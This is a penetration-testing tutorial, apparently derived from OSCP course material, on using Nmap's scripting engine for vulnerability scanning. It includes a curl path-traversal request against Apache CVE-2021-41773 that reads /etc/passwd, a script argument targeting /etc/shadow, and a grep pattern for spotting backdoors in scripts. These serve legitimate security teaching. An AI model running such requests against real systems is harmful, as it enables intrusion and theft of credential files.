Vulnerability Scanning with Nmap¶

Note: This guide is based on OffSec PEN-200 (OSCP) training materials, adapted and rephrased for educational purposes.

Table of Contents¶

Introduction
NSE Overview
NSE Vulnerability Scripts
Custom NSE Scripts
Practical Scanning Techniques
Best Practices
Common Scripts Reference
Troubleshooting

Introduction¶

The Nmap Scripting Engine (NSE) transforms Nmap from a port scanner into a lightweight vulnerability scanner. While less comprehensive than dedicated tools like Nessus, NSE excels at quick verification and targeted assessments.

Advantages: - Pre-installed on security platforms - Fast and lightweight - Highly customizable - No licensing costs - Active community

Limitations: - Smaller vulnerability database - Manual script management required - Limited reporting features - No patch recommendations

Use Cases: 1. Quick CVE verification 2. Confirming other tool findings 3. Lightweight scanning when full scanners unavailable 4. Targeted service assessment 5. Custom detection logic

NSE Overview¶

Script Categories¶

NSE scripts are organized by function and risk level:

Category	Risk	Purpose
`safe`	Low	No stability impact
`intrusive`	High	May crash services
`vuln`	Low-Med	Vulnerability detection
`exploit`	Very High	Active exploitation
`dos`	Critical	DoS testing
`auth`	Low-Med	Authentication testing
`brute`	Med-High	Password attacks
`discovery`	Low	Network discovery
`malware`	Low	Malware detection

Important: Scripts can have multiple categories (e.g., intrusive,vuln).

Script Locations¶

# Script directory
/usr/share/nmap/scripts/

# Script database
/usr/share/nmap/scripts/script.db

# List all vuln scripts
cat /usr/share/nmap/scripts/script.db | grep "\"vuln\""

# Count total scripts
ls /usr/share/nmap/scripts/*.nse | wc -l

NSE Vulnerability Scripts¶

The Vuln Category¶

Scripts in the vuln category detect vulnerabilities without necessarily exploiting them. Always verify script categories before execution:

nmap --script-help <script-name>

The Vulners Script¶

vulners.nse is the most valuable NSE vulnerability script—it queries the Vulners database for detected service versions.

Features: - Provides CVE identifiers - Includes CVSS scores - Links to detailed information - Marks exploits with *EXPLOIT* - Requires -sV flag

Basic Vulnerability Scan¶

sudo nmap -sV -p <ports> --script "vuln" <target>

Components: - sudo: Required for SYN scans - -sV: Service version detection (essential for vulners) - -p <ports>: Port specification - --script "vuln": All vuln category scripts

Example: Web Server Scan¶

sudo nmap -sV -p 443 --script "vuln" <target_ip>

Sample Output:

PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
| vulners: 
|   cpe:/a:apache:http_server:2.4.49: 
|     CVE-2021-42013    7.5 https://vulners.com/cve/CVE-2021-42013
|     CVE-2021-41773    7.5 https://vulners.com/cve/CVE-2021-41773
|     *EXPLOIT*

Analyzing Results¶

Priority 1: CVSS ≥ 7.0 (Critical/High) Priority 2: Marked with *EXPLOIT* Priority 3: Recent CVEs (current/previous year) Priority 4: Configuration issues

Custom NSE Scripts¶

Recent CVEs often require custom community-developed scripts.

Finding Scripts¶

Search strategies:

"CVE-YYYY-NNNNN nse script"
"<vulnerability-name> nmap script"

Sources: - GitHub repositories - Security researcher blogs - Exploit-DB - GitHub Gists

Security Verification¶

Before using custom scripts:

Source Check:
Reputable author?
Repository has stars/activity?
User reviews present?

Code Review:

cat <script-name>.nse | grep -i "exec\|system\|shell\|backdoor"

Test in Lab:

sudo tcpdump -i <interface> -w test.pcap &
sudo nmap --script "<script>" <test-target>

Red Flags: - Obfuscated code - Hardcoded IPs - External downloads - File system writes - Privilege escalation

Installation Process¶

# 1. Download
wget -O /tmp/<script>.nse <url>

# 2. Review
cat /tmp/<script>.nse

# 3. Install
sudo cp /tmp/<script>.nse /usr/share/nmap/scripts/

# 4. Update database
sudo nmap --script-updatedb

# 5. Verify
nmap --script-help <script>

Naming Convention: <protocol>-vuln-<cve-or-name>.nse

Example: CVE-2021-41773 (Apache Path Traversal)¶

# Install script
sudo cp http-vuln-cve2021-41773.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb

# Run scan
sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" <target>

# Manual verification
curl -k "http://<target>:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

Practical Scanning Techniques¶

Single Target Scans¶

# All ports (slow)
sudo nmap -sV -p- --script "vuln" <target>

# Common ports (balanced)
sudo nmap -sV --script "vuln" <target>

# Specific ports (fast)
sudo nmap -sV -p 80,443 --script "vuln" <target>

Multiple Target Scans¶

# IP range
sudo nmap -sV -p 80,443 --script "vuln" 192.168.1.0/24

# Comma-separated
sudo nmap -sV -p 80,443 --script "vuln" <ip1>,<ip2>,<ip3>

# From file
sudo nmap -sV -p 80,443 --script "vuln" -iL targets.txt

Service-Specific Scans¶

# HTTP/HTTPS
sudo nmap -sV -p 80,443 --script "http-vuln-*" <target>

# SMB
sudo nmap -sV -p 445 --script "smb-vuln-*" <target>

# SSL/TLS
sudo nmap -sV -p 443 --script "ssl-*" <target>

# SSH
sudo nmap -sV -p 22 --script "ssh-*" <target>

Targeted CVE Scanning¶

# Using vulners
sudo nmap -sV -p 80,443 --script "vulners" <target> -oN scan.txt

# Specific CVE (with custom script)
sudo nmap -sV -p 8080 --script "http-vuln-cve2021-44228" <target>

Combined Features¶

# With aggressive timing
sudo nmap -sV -T4 -p 80,443 --script "vuln" <target>

# With OS detection
sudo nmap -sV -O -p 80,443 --script "vuln" <target>

# Full comprehensive scan
sudo nmap -sV -sC -O -p 80,443 --script "vuln" <target>

# Save all formats
sudo nmap -sV -p 80,443 --script "vuln" <target> -oA scan_results

Best Practices¶

Safety Guidelines¶

Always check script categories:

grep "<script-name>" /usr/share/nmap/scripts/script.db

Risk Assessment:

Category	Risk	Action
`safe,vuln`	Low	Generally safe
`vuln`	Medium	Review first
`intrusive,vuln`	High	Lab test
`exploit`	Very High	Controlled only
`dos`	Critical	Never in production

Production Rules: - Use safe scripts only - Test in staging first - Schedule maintenance windows - Notify administrators - Monitor during execution - Have rollback plans

Performance Optimization¶

# Faster scan
sudo nmap -sV -T4 --max-retries 1 --script "vuln" <target>

# More accurate
sudo nmap -sV -T2 --max-retries 3 --script "vuln" <target>

# Parallel hosts
sudo nmap -sV --script "vuln" --min-hostgroup 10 <range>

Script Arguments¶

# Custom User-Agent
sudo nmap --script "http-vuln-*" \
  --script-args http.useragent="<agent>" <target>

# Script timeout
sudo nmap --script "vuln" --script-timeout 300s <target>

# Specific script argument
sudo nmap --script "http-vuln-cve2021-41773" \
  --script-args http-vuln-cve2021-41773.file="/etc/shadow" <target>

When to Use Nmap vs Dedicated Scanners¶

Use Nmap for: - Quick CVE verification - Limited resources - Verifying other tool findings - Targeted assessments - Integration with workflows

Use Dedicated Scanners for: - Comprehensive assessments - Large enterprise networks - Authenticated patch scanning - Compliance requirements - Detailed reporting

Recommended Hybrid Workflow: 1. Nmap port/service scan 2. Quick NSE vuln scan 3. Full Nessus scan 4. Nmap verification of critical findings 5. Manual testing 6. Exploitation/Reporting

Common Scripts Reference¶

HTTP Vulnerabilities¶

http-vuln-cve2021-41773 - Apache 2.4.49 path traversal
http-vuln-cve2017-5638 - Apache Struts RCE
http-shellshock - Bash Shellshock
http-csrf - CSRF detection
http-stored-xss - Stored XSS

SMB Vulnerabilities¶

smb-vuln-ms17-010 - EternalBlue
smb-vuln-ms08-067 - MS08-067
smb-vuln-cve-2017-7494 - SambaCry

SSL/TLS Vulnerabilities¶

ssl-heartbleed - Heartbleed
ssl-poodle - POODLE
ssl-ccs-injection - CCS injection
sslv2-drown - DROWN attack

Other Services¶

ftp-anon - Anonymous FTP
ftp-vsftpd-backdoor - vsftpd backdoor
mysql-vuln-cve2012-2122 - MySQL auth bypass
ssh-brute - SSH brute force

Troubleshooting¶

Common Issues¶

Script Not Found:

sudo nmap --script-updatedb
ls /usr/share/nmap/scripts/<script-name>.nse

No Vulners Results:

# Ensure -sV is enabled
sudo nmap -sV --version-intensity 9 --script "vulners" <target>

Script Timeout:

sudo nmap --script "vuln" --script-timeout 300s <target>

Permission Denied:

sudo nmap --script "vuln" <target>

Debugging¶

# Basic debug
sudo nmap -d --script "vuln" <target>

# Detailed debug
sudo nmap -d2 --script "vuln" <target>

# Packet trace
sudo nmap --packet-trace --script "<script>" <target>

# Script trace
sudo nmap --script-trace --script "<script>" <target>

Quick Reference¶

Essential Commands¶

# Basic vuln scan
sudo nmap -sV -p <ports> --script "vuln" <target>

# Service-specific
sudo nmap -sV -p <port> --script "<service>-vuln-*" <target>

# Custom script
sudo cp <script>.nse /usr/share/nmap/scripts/ && sudo nmap --script-updatedb

# Targeted CVE
sudo nmap -sV -p <port> --script "<cve-script>" <target>

# Save results
sudo nmap -sV -p <ports> --script "vuln" <target> -oA results

Best Practices Checklist¶

Summary¶

NSE provides effective lightweight vulnerability scanning capabilities within Nmap. While not as comprehensive as dedicated scanners, it excels at rapid verification and targeted assessments. The vulners script offers current CVE information, and custom scripts extend functionality for recent vulnerabilities.

Key Principles: - Verify script categories for safety - Require -sV for vulners functionality - Review custom scripts before use - Manually confirm findings - Combine with dedicated scanners for comprehensive coverage - Understand system impact risks

NSE complements dedicated vulnerability scanners and belongs in every penetration tester's toolkit.

Content derived from OffSec PEN-200 courseware